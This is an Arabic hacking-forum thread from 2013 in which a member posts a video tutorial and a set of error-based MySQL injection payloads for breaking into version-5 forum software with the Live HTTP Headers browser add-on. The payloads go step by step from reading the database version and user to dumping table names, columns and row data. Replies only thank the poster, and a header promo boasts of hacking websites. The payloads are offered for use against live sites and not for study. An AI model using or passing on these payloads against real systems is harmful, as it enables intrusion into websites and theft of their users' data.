1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ شرح ] ثغرة الحقن للمنتديات الاصدار الخامس من خلال اداة http live

الموضوع في '[ SQL-injection ]' بواسطة Spamber Dz, بتاريخ ‏20 أكتوبر 2013.

كاتب الموضوع : Spamber Dz المشاهدات : 664 الردود : 6 ‏20 أكتوبر 2013
حالة الموضوع:
مغلق
  1. غير متصل

    Spamber Dz
    rankrank
    Developer

    عضو منذ:
    ‏30 ديسمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    السلام عليكم ورحمة الله وبركاته

    شرح ثغرة الحقن للمنتديات الاصدار الخامس من خلال اداة http live

    الفديو

    [YOUTUBE]b2_UCsX1nWw[/YOUTUBE]

    لاداه : Live HTTP Headers

    رابط الاداه لمتصفح فايرفوكس

    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]


    بعض الحركات المستخدمه في الشرح

    كود PHP:
    *********************************************************************************************************************
    |
    Version():
     *********************************************************************************************************************
    ) and(
    select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
     
    *********************************************************************************************************************



     *********************************************************************************************************************
    |
    User():
     *********************************************************************************************************************
     *********************************************************************************************************************
    ) and(
    select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(user() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
     
    *********************************************************************************************************************



     *********************************************************************************************************************
    |
    Database():
     *********************************************************************************************************************
     *********************************************************************************************************************
    ) and(
    select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
     
    *********************************************************************************************************************


     *********************************************************************************************************************
    |
    Database Print:
     *********************************************************************************************************************
     *********************************************************************************************************************
    ) and(
    select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7eFROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
     
    *********************************************************************************************************************



     *********************************************************************************************************************
    |
    Table Count:
     *********************************************************************************************************************
     *********************************************************************************************************************
    ) and(
    select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7eFROM `information_schema`.tables WHERE table_schema=0xHEXCODEOFDATABASE)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
     
    *********************************************************************************************************************



     *********************************************************************************************************************
    |Print 
    Tables:
     *********************************************************************************************************************
     *********************************************************************************************************************
    ) and(
    select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7eFROM information_schema.tables Where table_schema=0xHEXCODEOFDATABASE LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
     
    *********************************************************************************************************************



     *********************************************************************************************************************
    |
    Columns of selected table:
     *********************************************************************************************************************
     *********************************************************************************************************************
    ) and(
    select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(column_name),0x27,0x7eFROM `information_schema`.columns WHERE table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
     
    *********************************************************************************************************************



     *********************************************************************************************************************
    |
    Fetch Out Data:
     *********************************************************************************************************************
     *********************************************************************************************************************
    ) and(
    select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,column1,0x27,0x7e,column2,0x27,0x 7eFROM ANY_TABLE LIMIT N,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
     
    *********************************************************************************************************************
     


    جاري تحميل الصفحة...
  2. غير متصل

    ملـك بدون مملكه
    DeveloPer Plus

    عضو منذ:
    ‏11 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: ثغرة الحقن للمنتديات الاصدار الخامس من خلال اداة http live

    الله يعطيك الف عافية اخوي
     


  3. غير متصل

    R0CKO
    rank
    Developer

    عضو منذ:
    ‏8 يوليو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: ثغرة الحقن للمنتديات الاصدار الخامس من خلال اداة http live

    السلام عليكم
    تسلم يا غالي
     


  4. غير متصل

    Ahmed Hamody
    rankrank
    ExpErt DeveloPer

    عضو منذ:
    ‏24 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    الإقامة:

    رد: ثغرة الحقن للمنتديات الاصدار الخامس من خلال اداة http live

    دايم بطل ومبدع يا صاحبي واصل
     


  5. غير متصل

    intel
    rankrank
    Developer

    عضو منذ:
    ‏3 ديسمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: ثغرة الحقن للمنتديات الاصدار الخامس من خلال اداة http live

    موفقـ..
     


  6. غير متصل

    Red Virus
    rankrank
    Developer

    عضو منذ:
    ‏4 ديسمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: ثغرة الحقن للمنتديات الاصدار الخامس من خلال اداة http live

    الف شكر لك يالغالي

    جعلها بميزان حسناتك
     


  7. غير متصل

    Egy HacKerS
    DeveloPer Plus

    عضو منذ:
    ‏1 ديسمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    19
    نقاط الجائزة:
    الوظيفة:
    HacKer
    الإقامة:

    رد: ثغرة الحقن للمنتديات الاصدار الخامس من خلال اداة http live

    احسنت اخى الكريم

    موضوع فى قمة الافاده
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...